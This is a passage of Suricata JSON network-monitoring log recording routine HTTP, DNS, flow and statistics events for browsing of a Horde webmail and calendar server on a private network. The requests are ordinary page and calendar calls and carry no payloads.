{"timestamp":"2020-02-29T00:02:38.757982+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34702,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:02:39.033401+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1586,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:39.200940+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211}} 
{"timestamp":"2020-02-29T00:02:40.000187+0000","flow_id":1615370099269153,"event_type":"flow","src_ip":"192.168.10.122","src_port":58514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.761377+0000","end":"2020-02-28T23:57:38.872715+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:40.000436+0000","flow_id":2191913624185226,"event_type":"flow","src_ip":"192.168.10.122","src_port":36276,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.567690+0000","end":"2020-02-28T23:57:38.678900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:41.000155+0000","event_type":"stats","stats":{"uptime":13813,"capture":{"kernel_packets":132655,"kernel_drops":0},"decoder":{"pkts":132655,"bytes":92034766,"invalid":180,"ipv4":131226,"ipv6":8,"ethernet":132655,"raw":0,"null":0,"sll":0,"tcp":126227,"udp":4805,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2674,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2690,"synack":2681,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app
_layer":{"flow":{"http":1718,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2191,"failed_udp":106},"tx":{"http":4463,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2268}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2237,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53939,"memcap":0}}} {"timestamp":"2020-02-29T00:02:41.140036+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35317,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:41.420240+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:02:44.205072+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18534,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.228358+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25550,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:46.422892+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.754219+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1892,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.762300+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":225,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:46.771672+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.000764+0000","flow_id":758296490976534,"event_type":"flow","src_ip":"192.168.10.122","src_port":42304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:46.173334+0000","end":"2020-02-28T23:57:46.284674+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:47.047330+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 
(KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344}} {"timestamp":"2020-02-29T00:02:47.196304+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.204147+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.376092+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.390279+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15738,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.528668+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58469,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} 
{"timestamp":"2020-02-29T00:02:48.000399+0000","event_type":"stats","stats":{"uptime":13820,"capture":{"kernel_packets":132674,"kernel_drops":0},"decoder":{"pkts":132691,"bytes":92050316,"invalid":180,"ipv4":131262,"ipv6":8,"ethernet":132691,"raw":0,"null":0,"sll":0,"tcp":126258,"udp":4810,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2675,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2691,"synack":2682,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1720,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2192,"failed_udp":107},"tx":{"http":4465,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2269}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2239,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21821,"memcap_state":0,"memcap_global":0},"http":{"memuse":136750,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:51.772560+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18578,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.000469+0000","flow_id":1308142499499515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60747,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:51.757243+0000","end":"2020-02-28T23:57:51.868541+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.000920+0000","flow_id":1544885391843999,"event_type":"flow","src_ip":"192.168.10.122","src_port":54287,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:51.451231+0000","end":"2020-02-28T23:57:51.562559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.668193+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.668279+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:02:53.000849+0000","flow_id":248440938960222,"event_type":"flow","src_ip":"192.168.10.130","src_port":34696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":16,"pkts_toclient":22,"bytes_toserver":1621,"bytes_toclient":23106,"start":"2020-02-29T00:01:46.922974+0000","end":"2020-02-29T00:01:52.380357+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:55.000229+0000","event_type":"stats","stats":{"uptime":13827,"capture":{"kernel_packets":132775,"kernel_drops":0},"decoder":{"pkts":132777,"bytes":92092100,"invalid":180,"ipv4":131348,"ipv6":8,"ethernet":132777,"raw":0,"null":0,"sll":0,"tcp":126334,"udp":4820,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2678,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2694,"synack":2685,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1723,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2197,"failed_udp":107},"tx":{"http":4470,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2274}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_